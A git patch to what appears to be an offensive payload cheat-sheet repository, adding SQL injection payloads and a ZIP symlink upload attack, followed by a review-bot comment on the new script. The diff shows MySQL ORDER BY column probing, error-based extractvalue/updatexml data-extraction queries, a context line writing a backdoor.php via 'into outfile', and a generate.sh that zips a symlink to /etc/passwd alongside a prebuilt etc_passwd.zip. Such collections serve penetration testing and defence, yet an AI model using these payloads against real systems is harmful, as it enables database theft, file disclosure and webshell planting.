From 6070ece522e67839b0bdae20cd8db83db99da3df Mon Sep 17 00:00:00 2001
From: Swissky
Date: Tue, 4 Jul 2017 23:17:59 +0200
Subject: [PATCH] Symbolic Link Zip + SQL injection ORDER BY
---
 PHP include/README.md | 3 ++-
 SQL injection/MySQL Injection.md | 14 ++++++++++++--
 .../ZIP Symbolic Link/etc_passwd.zip | Bin 0 -> 169 bytes
 .../ZIP Symbolic Link/generate.sh | 2 ++
 4 files changed, 16 insertions(+), 3 deletions(-)
 create mode 100644 Upload insecure files/ZIP Symbolic Link/etc_passwd.zip
 create mode 100644 Upload insecure files/ZIP Symbolic Link/generate.sh
diff --git a/PHP include/README.md b/PHP include/README.md
index 43b07f8..8632bd4 100644
--- a/PHP include/README.md
+++ b/PHP include/README.md
@@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
 ```
 ## Thanks to
-* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
+* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index 8ed4d4a..5ba6055 100644
--- a/SQL injection/MySQL Injection.md
+++ b/SQL injection/MySQL Injection.md
@@ -1,5 +1,15 @@
 # MYSQL Injection
+##Detect columns number
+Using a simple ORDER
+```
+order by 1
+order by 2
+order by 3
+...
+order by XXX
+```
+
 ##MySQL Union Based
 ```
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
@@ -24,7 +34,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
 ```
 ##MYSQL Error Based - Extractvalue function
-```
+```
 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
@@ -61,4 +71,4 @@ AND MAKE_SET(YOLO" into outfile "C:\\xampp\\htdocs\\backdoor.php"
-```
\ No newline at end of file
+```
diff --git a/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip b/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip
new file mode 100644
index 0000000000000000000000000000000000000000..7d4e2a903d2af1a4ca59e02e38bed31fc6fd4013
GIT binary patch literal 169 zcmWIWW@h1H00FP9PrSHx%4>21*&xiqAj6Q8nU@_J!pXqA=5KT)2$xoHGcdBeUsNOWc`A~;^Oj@0B=SnIc8i&Nq}qsgZ~Rb6vSXwh{0%v26(fwfz&Vpp%;+$1aTMu D2=gG^ literal 0 HcmV?d00001
diff --git a/Upload insecure files/ZIP Symbolic Link/generate.sh b/Upload insecure files/ZIP Symbolic Link/generate.sh
new file mode 100644
index 0000000..cefdd26
--- /dev/null
+++ b/Upload insecure files/ZIP Symbolic Link/generate.sh
@@ -0,0 +1,2 @@
+ln -s /etc/passwd link
+zip --symlinks test.zip link
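Review bot: The new generate.sh writes `test.zip`, while the archive committed beside it in this patch is `etc_passwd.zip`, so the script and the checked-in fixture cannot be matched by name; `zip --symlinks etc_passwd.zip link` would tie the two together. The script also has no shebang and no header saying what the archive is for. A first line of `#!/bin/sh` followed by `# Test fixture: archive with a single symlink entry, for checking that an unzip step rejects link entries or keeps resolved paths inside the extraction directory` would put the mitigation next to the sample. The `link` symlink is left in the working directory, so on a second run `ln -s` reports that the file exists; since the script does not check exit status, `zip` then runs against the existing archive.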